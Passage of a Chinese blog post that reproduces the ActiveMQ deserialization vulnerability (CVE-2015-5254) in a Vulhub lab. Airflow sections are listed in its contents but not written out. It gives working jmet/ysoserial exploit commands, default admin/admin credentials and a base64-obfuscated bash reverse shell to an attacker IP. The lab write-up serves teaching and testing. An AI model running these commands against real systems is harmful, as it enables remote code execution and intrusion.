38种未授权访问漏洞总结(1)

本文详细介绍了ActiveMQ的反序列化漏洞(CVE-2015-5254)和任意文件写入漏洞(CVE-2016-3088),包括如何利用这些漏洞进行webshell发送和文件写入。此外,还分析了Apache Airflow的命令注入、远程命令执行和身份验证绕过漏洞,探讨了漏洞利用的条件和过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

本次复现,我们使用的是Vulhub里面的环境

地址:Vulhub - Docker-Compose file for vulnerability environment

安装按着他的来就行了,一般没有问题

安装之后进入目录开启环境就好了

目录

1. ActiveMQ 未授权访问

1. ActiveMQ 反序列化漏洞 (CVE-2015-5254)

2.ActiveMQ 任意文件写入漏洞 (CVE-2016-3088)

1.发送webshell

2.写入cron或ssh key

2.Apache Airflow漏洞

1.Apache Airflow 命令注入(CVE-2020-11978)

 2.Airflow Celery Broker 远程命令执行 (CVE-2020-11981)

3.Apache Airflow 身份验证绕过 (CVE-2020-17526)


1. ActiveMQ 未授权访问

1. ActiveMQ 反序列化漏洞 (CVE-2015-5254)

通过访问admin登录,默认用户密码 admin/admin

利用这个环境我们需要使用jmet这个工具。首先下载jmet的jar文件,并在同目录下创建名为external的文件夹(否则可能会出现文件夹不存在的错误)

jmet是使用ysoserial生成Payload并发送(jar自带ysoserial,我们不用再下载),所以我们需要选择一个能在ysoserial中使用的gadget,比如ROME .

jmet: GitHub - matthiaskaiser/jmet: Java Message Exploitation Tool

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME your-ip 61616

在目录下创建extrnal 不然有报错信息

 然后访问http://192.168.1.108:8161/admin/browse.jsp?JMSDestination=event

 发现新增了记录

这里点击ID会触发命令执行的 

我们可以通过docker查看命令有没有正常执行

我们发现命令成功执行在tmp下创建了sucess

我们继续执行反弹shell

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMzQvMTkxMTEgMD4mMQ==}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.1.108 61616

 

成功连接 复现结束

注意这个漏洞的利用在于传递信息,让管理员点击,就会造成漏洞 

总结这个漏洞不需要登录密码,但需要管理员点击

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

许允er

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值